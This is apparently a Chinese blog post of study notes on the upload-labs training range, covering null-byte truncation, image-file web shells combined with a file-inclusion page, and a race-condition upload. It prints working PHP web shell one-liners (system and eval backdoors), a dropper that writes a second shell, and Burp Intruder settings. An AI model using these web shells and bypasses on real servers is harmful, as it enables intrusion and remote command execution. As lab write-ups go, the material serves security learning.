暑假第二周练习(一)文件上传漏洞(二)

最新推荐文章于 2023-08-20 16:54:46 发布
最新推荐文章于 2023-08-20 16:54:46 发布
阅读量536 收藏
点赞数
分类专栏: 文件上传漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45869039/article/details/107368614
版权

继续总结,烧脑!

目录:
0×01:白名单限制
0×02:内容限制
0×03:竞争条件

0×01 白名单限制

指名单内都是允许上传的格式。但是试验前,我们需要在php.ini里关闭magic_quotes_gpc函数。
常见的的截断:%00截断 和 0×00截断

在upload-labs的第12关里,
先看一下源码:

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

在 :$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
img_path是拼接而成的,我们可以使用截断。
因为是GET方式所以我们用%00截断。因为get传参 的参数 会被 服务器进行URL解码,%00被URL解码之后就是ascii 0。
抓包。
在这里插入图片描述
在这里进行%00截断
在这里插入图片描述
上传成功。

而靶场的第13关,提交的方式为POST,post不会像get对%00进行自动解码,所以需要在16进制中进行修改00。
在然后在Hex中查看机器码
在这里插入图片描述
这样就截断成功了。

0×02 内容限制

在这里插入图片描述
查看源码:

function getReailFileType($filename){
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); //只读2字节
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);    
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    
    $fileType = '';    
    switch($typeCode){      
        case 255216:            
            $fileType = 'jpg';
            break;
        case 13780:            
            $fileType = 'png';
            break;        
        case 7173:            
            $fileType = 'gif';
            break;
        default:            
            $fileType = 'unknown';
        }    
        return $fileType;
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_type = getReailFileType($temp_file);

    if($file_type == 'unknown'){
        $msg = "文件未知,上传失败!";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错!";
        }
    }
}

检测原理:通过检测文件的前两个字节判断文件类型,满足即可上传。
我们可以直接上传图片马。
图片吗制作方法:copy normal.jpg /b + shell.php /a webshell.jpg 或者 exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' 1.jpg

用方法一制作,
在这里插入图片描述

在这里插入图片描述
查看图像给的路径却连不上去,

<?php
/*
本页面存在文件包含漏洞,用于测试图片马是否能正常运行!
*/
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
    include $file;
}else{
    show_source(__file__);
}
?>

在include.php里,对我们传的文件进行PHP解析。所以我我们需要把路径改一下,
在这里插入图片描述

这个需要结合文件包含漏洞,连接成功。

0×03 竞争条件

文件上传过程

在这里插入图片描述
竞争条件原理
网站逻辑:
1、网站允许上传任意文件,然后检查上传文件是否包含webshell,如果包含删除该文件。
2、网站允许上传任意文件,但是如果不是指定类型,那么使用unlink删除文件。
文件上传成功后和删除文件之间存在短的时间差。攻击者可以利用这个时间差完成竞争条件的上传漏洞攻击。并行服务器会并发执行多个线程,这就给了不法分子用条件竞争来绕过防护的机会。

攻击者先上传一个图片马shell.php,shell.php的内容是生成另一个图片马webshell.php。
shell.php的代码内容:

<?php
fputs(fopen('../webshell.php','w'),'<?php @eval($_POST['a']);?>');
?>

通过写的方式将<?php @eval($_POST['a']);?>写近webshell.php。这就利用时间差上传了webshell。

靶场第18关源码展示:

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

我们先上传一个文件看其被存起来的路径。
现在我们只需要,上传1.php,用burpsuit 拦截数据包,然后将数据包放在burpsuit的爆破模块中。
然后访问http://localhost/upload-labs/upload/shell.php
同样,将请求拦截,放在burpsuit的爆破模块中。最后,在爆破模块中,让两者同时不断进行,等待那关键的一瞬间就可以了。
具体操作:
1.对两者都进行抓包,右键,send to intruder
2.首先 clear $ ,然后在payload中选择 Nullpayload,然后设置Generate 10000表示没有payload,上传一万次,然后在Option中,设置Number of thread线程数为200

武侠中高手对决,输赢只在一刹那。 在那短短的一刹那,假如你上传的文件,是个 大马套小马呢?大马虽死,但同源文件夹中,小马犹生。一个网站便在弹指一挥间被拿下了。

但是这个需要用到多线程burp suite专业版才会有多线程,我们还需要下载专业版。
肝了n个小时。。。还是没成功🤔🤔🤔🤔🤔🤔

仍需努力!

小小奇点呀!
关注
专栏目录
暑期练习web25:web code(i春秋)index.php文件包含、base64图片加密
qq_41618162的博客
08-24 1230
这次有意思,上来就是个萌妹子 但我们不能光看妹子,学习更重要!查看一波源码,很长一段,前面提示了是base64(html中图片可以用base64表示,那么用base64表示的文本就是破损图片) 但是我把这段拿去解码却弄不出 1.考虑到文件包含的可能,我就试了下index.php,没反应后再写jpg=index.php这时候就出来新的源码了 &amp;lt;title&amp;gt;file:index...
华南理工机械考研经验贴——踏踏实实复习是硬道理,第一没有捷径
Graduate_Box的博客
08-29 566
华南理工机械考研经验贴——踏踏实实复习是硬道理,第一没有捷径回想一下自己的考研,平静的时光,充实的安排。心中的目标时刻闪亮,为了自己理想的学校,三分迷茫,三分热学,三分汗水,一分幸运,怀念那个时候的生活状态,其实人生会很少有几次这样的机会,心无旁骛的朝着目标努力。进入正题 首先我自我介绍一下,2020考研上岸华南理工大学机械与汽车工程学院金属材料加工工程,初试成绩387,政治80、英一71、数122、专业课114。初试统考第一,最后总成绩第一顺利录取。分享一下我的考研经过。...
文件上传漏洞练习 upload-labs(1~5)【js过滤,MIME过滤,黑名单过滤,.htaccess文件攻击,.user,ini文件攻击】
bin789456的博客
07-25 924
文件上传漏洞练习 upload-labs(1~5)【入门】 写在前面 文件上传是个常见的漏洞,也是CTF的考察点之一。环境的搭建较为简单,放出链接: https://github.com/c0ny1/upload-labs 我直接使用Windows集成包,放在php下面跑就行。 因为隐私和web shell的特殊性,演示到上传成功就会结束题目 来吧,现在就开始。 Pass-01 这是一个最为常见的js过滤,即只能使用图片格式的后缀,否则不予上传。 方法一:先将脚本的后缀改为.jpg再上传,随后抓包改回来。
文件上传漏洞
weixin_54330542的博客
09-26 1396
那么chr(0)就很好理解了,对照ASCII码表可以知道,ASCII码为0-127的数字,每个数字对应一个字符,而0对应的就是NUT字符(NULL),也就是空字符,而截断的关键就是这个空字符,当一个字符串中存在空字符的时候,在被解析的时候会导致空字符后面的字符被丢弃。直接看源码,明显看出此时的代码是白名单上传,只允许jpg,png,gif这3种后缀上传,那之前的什么大小写绕过,复写绕过,.htaccess文件上传等方式都无效了。文件头是文件开头的一段进制,不同的图片类型,文件头是不同的。
文件上传漏洞总结
weixin_46739058的博客
03-18 1万+
目录 1、文件上传漏洞原理 2、常见的文件上传类型 3、文件上传注入点 4、web中常见的上传验证 黑名单常见自定义过滤规则 白名单常见的过滤规则 5、逻辑数组绕过 5.1、图片一句话木马的制作与利用 5.2、文件头检查 5.3、getimagesize()图像信息判断 5.4、竞争条件攻击 5.5、突破exif_imagetype() 5.6、脚本解析漏洞 6、WAF绕过 1、文件上传漏洞原理 网站Web应用都有一些文件上传功能,比如文档、图片、头像、视频上传,当上
Upload-labs文件上传漏洞(上传路径可控)——Pass11
Zichel77的博客
07-28 1161
0×00 题目概述 0×01 源代码 $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1); if(in_array($file_ext,$
upload-labs:pass-14
羽的博客
07-11 1271
这里是白名单了。而且题目叫传图片马。 所以,首先制作图片马。 图片马制作方法一 图片马制作方法 这里要说清:上传的图片马并不会直接执行,你用菜刀或者蚁剑直接连图片马也是不可以的,因为后端程序不会莫名其妙的把图片解析成进制码。所以要配合文件包含漏洞,upload-labs提供了这样的漏洞。 <?php /* 本页面存在文件包含漏洞,用于测试图片马是否能正常运行! */ header("Content-Type:text/html;charset=utf-8"); $file...
名优专供河北省衡水中学高物理第六套暑假作业pdf
09-10
1. 牛顿运动定律:高物理的核心内容之一,包括牛顿第一定律(惯性定律)、第定律(力的作用效果与物体质量、加速度的关系)和第三定律(作用力与反作用力)。暑假作业中可能会设计各种实际情境,让学生运用这些...
河南省原阳县第一高级中学2022届高三上学期8月开学适应性考试理科综合物理试题 .rar
09-29
这篇文档是针对“河南省原阳县第一高级中学2022届高三上学期8月开学适应性考试”的理科综合物理部分的试题集。这样的试题通常包含了高中三年级学生在新学期开始前需要掌握的物理知识,旨在帮助学生适应即将到来的...
小升初语文基础知识练习.doc
12-17
- 咀嚼:jué,此处“嚼”读第声,表示咀嚼食物的动作。 - 暖和:huo,此处“和”读轻声,表示温暖。 - 上大夫:dà,此处“大”读第一声,表示古代官职。 - 细胞:bāo,表示生物体的基本结构单位。 - 破绽...
Web安全之文件包含漏洞
最新发布
qq_42751192的博客
08-20 200
文件包含漏洞:即 file inclusion,意思是文件包含,是指当服务器开启 allow_url_include 选项时,就可以通过 PHP 的某些特性函数( include(),require() 和 include_once(),requir_once())利用 URL 去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。
upload-labs文件上传靶场13-15 最详细最全
wrypot的博客
03-16 521
include.php文件包含只会将内容进行php解析,新手注意文件包含并不是include把文件包住,而是include.php?如果你没有这个界面那么记住这里有一个组合拳,就是利用前面的关卡上传一个include.php,13题是白名单,无法上传.php文件的。注意:先看有没有include.php,自己搭建的靶场没有,fofa里面找到靶场是自带include.php的。通过前面的关卡上传include.php之后就可以利用文件包含漏洞去解析了,上传的include.php文件里面的内容是。
upload-labs 学习笔记(四)Pass 12-16
闵行小鱼塘
09-27 413
继续学习upload-labs,本篇是Pass 12-16
关于图片马的正确用法
热门推荐
qq_42311391的博客
04-23 4万+
有图片,有木马,然而菜刀连接不上,你绝望吗?不怕今天我会教大家的。 我们先看一下源码吧,过关方式也是叫我们上传图片马。。。 然后我还要说吗一下,图片马不是一张木马图片一个菜刀就可以了的。还需要一个漏洞,叫做文件包含漏洞。。。这个漏洞原理呢 一:准备图片马 需要用到DOS指令 Bash copy 001.jpeg/b + test.php/a 2.jpg 这个...
文件上传漏洞实例(upload-labs11-19)
whoim_i的博客
02-26 4654
目录前言pass-11(get00截断)pass-12(post 00截断)pass-13(图片马unpack)pass-14(getimagesize图片马)pass-15(exif_imagetype图片马)pass-16(次渲染绕过)pass-17(条件竞争)pass-18(条件竞争)pass-19(./绕过)       &n...
upload-labs学习记录
qq_41260930的博客
11-29 3824
文章目录1. 基础知识1.1. 简介1.2. 原理1.3. 危害1.4. 常见的文件上传的检测方法与绕过策略1.4.1. 客户端1.4.1.1. Javascript检测1.4.1.1.1. 绕过策略(更改数据包内容)1.4.2. 服务端1.4.2.1. MIME类型检测(Content-Type检测)1.4.2.1.1. 绕过策略(更改数据包内容)1.4.2.2. 文件内容检测1.4.2.2.1...
网络攻防入门---文件包含漏洞
濯君
12-27 300
有些网页具有包含其他页面到当前页面的功能,是通过URL设置参数添加进来的,比如下面这个URL http://192.168.232.128/dvwa/vulnerabilities/fi/?page=include.php 将include.php包含进来 一:low级别 <?php $file = $_GET['page']; //The page we wish to display ?> 因为源码中没有对页面进行检查,直接包含,所以可以随意引入其他页面 比如引入c.p
PHP文件包含漏洞
weixin_34161083的博客
05-04 99
PHP文件包含漏洞php的函数引入文件是,由于传入的文件没有经过合理的校验,从而操作了预想之外的文件,就可以导致意外的文件泄露,甚至导致恶意代码的注入。基本的代码:If($_GET[‘func’]){Include $_GET[‘func’]}Else{Include ‘default.php’}本意运行的是http://127.0.0.1/index.php?func=add.php,结果在后...
Upload labs
qq_52715164的博客
04-24 1305
Pass -01(js检查) 题目基于前端js过滤,只能上传图片格式的文件,所以我们用一句话木马,改后缀上传后,用burp抓包,修改文件后缀为php,然后用蚁剑连接, 注意: 文件没有上传在具体题目中的文件夹中,所以我们在用蚁剑连接的时候,需要注意其地址 Pass -02(只验证Content-type) 根据源代码我们可以发现,这一关是常见验证中的文件类型验证,也就是验证MIME信息 所以这里可以直接上传php文件,然后用burp抓包,修改content-type为图片类型: image/jpeg、ima
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值